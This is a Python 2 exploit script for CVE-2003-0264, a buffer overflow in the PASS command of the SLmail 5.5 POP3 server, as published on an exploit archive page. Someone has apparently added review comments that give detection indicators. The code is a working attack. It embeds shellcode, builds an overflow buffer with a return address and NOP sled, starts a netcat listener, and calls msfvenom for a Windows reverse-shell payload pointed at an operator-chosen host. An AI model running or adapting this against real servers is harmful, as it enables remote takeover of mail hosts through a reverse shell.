## https://sploitus.com/exploit?id=PACKETSTORM:161526
# -*- coding: utf-8 -*-  
import socket  
from time import sleep  
from os import system  
  
# Operator menu. The prompt (Portuguese) asks whether shell code has already
# been supplied: 1 = yes ("sim"), 2 = no ("nao"). The answer is stored in
# `quest` and used by the dispatch at the bottom of the script.
system("clear")  
print 'Shell-code-foi-informada?\r\n'  
print '[1] sim'  
print '[2] nao\n'  
# NOTE(review): this is Python 2 code (print statements, raw_input further
# down). In Python 2, input() is eval(raw_input()), so the text typed here is
# evaluated as a Python expression before int() sees it. The non-evaluating
# form is int(raw_input('>>> ')). Flagged only; code left as published.
quest = int(input('>>> '))  
  
# main(): proof-of-concept client for the issue the banner below labels as
# CVE-2003-0264 (SLmail 5.5 POP3 overflow, Windows). It opens a POP3 session to
# TCP 110 on the typed host, sends "USER guest", then a PASS command whose
# argument is several thousand bytes long.
# NOTE(review): indentation was lost when this page was extracted; the lines
# down to s.close() presumably form the body of main() - confirm against the
# original listing.
def main():  
system("clear")  
#============================  
#--insert-your-shell-code-here  
  
# Payload bytes as published on the page; they are not decoded in this review.
buf = ""  
buf += "\xb8\xaa\x62\xd3\xea\xda\xd4\xd9\x74\x24\xf4\x5e\x29"  
buf += "\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x44\x9e\x31"  
buf += "\x1f\x64\xb7\x34\xe0\x94\x48\x59\x68\x71\x79\x59\x0e"  
buf += "\xf2\x2a\x69\x44\x56\xc7\x02\x08\x42\x5c\x66\x85\x65"  
buf += "\xd5\xcd\xf3\x48\xe6\x7e\xc7\xcb\x64\x7d\x14\x2b\x54"  
buf += "\x4e\x69\x2a\x91\xb3\x80\x7e\x4a\xbf\x37\x6e\xff\xf5"  
buf += "\x8b\x05\xb3\x18\x8c\xfa\x04\x1a\xbd\xad\x1f\x45\x1d"  
buf += "\x4c\xf3\xfd\x14\x56\x10\x3b\xee\xed\xe2\xb7\xf1\x27"  
buf += "\x3b\x37\x5d\x06\xf3\xca\x9f\x4f\x34\x35\xea\xb9\x46"  
buf += "\xc8\xed\x7e\x34\x16\x7b\x64\x9e\xdd\xdb\x40\x1e\x31"  
  
#===========================  
  
print 'Exploit - CVE-2003-0264\nplatfor: windows\nPOP3 SLmail-5.5 overflow :)'  
print '\nby: - Mednic -\r\n'  
host = raw_input('Host: ')  
  
# Layout of the PASS argument: 2606 filler bytes ("A"), a 4-byte value, 39
# bytes of 0x90, then buf. Presumably the 4-byte value lands on a saved return
# address - confirm against the advisory.
# Detection note: a POP3 PASS argument thousands of bytes long, or one carrying
# non-printable bytes such as a run of 0x90, is anomalous by itself. A length
# cap on POP3 command lines at a proxy or IDS catches this request shape
# regardless of the payload that follows.
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 39 + buf  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
sleep(3)  
print '\nIniciando conexão ao servidor...\n'  
sleep(2)  
# Connect to the POP3 port and read up to 1024 bytes (presumably the server
# greeting); the data is discarded.
# NOTE(review): the bare except reports every failure, not only a refused
# connection, with the same 'Conexão recusada !' message.
try:  
s.connect((host, 110))  
s.recv(1024)  
except:  
print 'Conexão recusada !'  
exit()  
s.settimeout(1)  
print '\nEnviando usuario...\n'  
# Fixed username. In server logs, "USER guest" followed at once by an oversized
# PASS from the same peer matches the sequence this script sends.
s.send("USER guest\r\n")  
s.recv(1024)  
s.settimeout(1)  
print '\nIniciando estouro de buffer...\n'  
# Starts a local netcat listener on TCP 444, the same port the option-2 branch
# passes as LPORT for a windows/shell_reverse_tcp payload.
# Responder note: an outbound TCP connection from the mail server host to port
# 444 shortly after such a PASS command is an indicator that the overflow was
# triggered successfully.
system('nc -nlvp 444')  
s.send("PASS "+buffer+"\r\n")  
s.recv(1024)  
s.send("QUIT\r\n")  
s.close()  
  
# Dispatch on the menu answer read at the top of the script.
# 1 -> run main() with the payload bytes already present in the file.
if quest == 1:  
main()  
  
# 2 -> ask for an address, run msfvenom for a windows/shell_reverse_tcp payload
# with LPORT=444 and the bytes \x00 \x0a \x0d \x20 excluded, then tell the
# operator to paste the generated output into the script.
# NOTE(review): `ip` is concatenated into a string handed to os.system(), so
# the typed text is interpreted by the shell (command injection in the tool
# itself). A list-argument subprocess call would not pass it through a shell.
# Flagged only; code left as published.
elif quest == 2:  
print "IP para conexão reversa !"  
ip = raw_input('>>> ')  
system('clear')  
system('msfvenom -p windows/shell_reverse_tcp LHOST='+ip+" LPORT=444 -b "+'\\x00\\x0a\\x0d\\x20'+" -f python")  
print '\r\nCopie e substitua pelo setado no codigo !'  
# Any other answer: print an "invalid argument" message and exit.
else:  
print 'Invalido argumento'  
exit()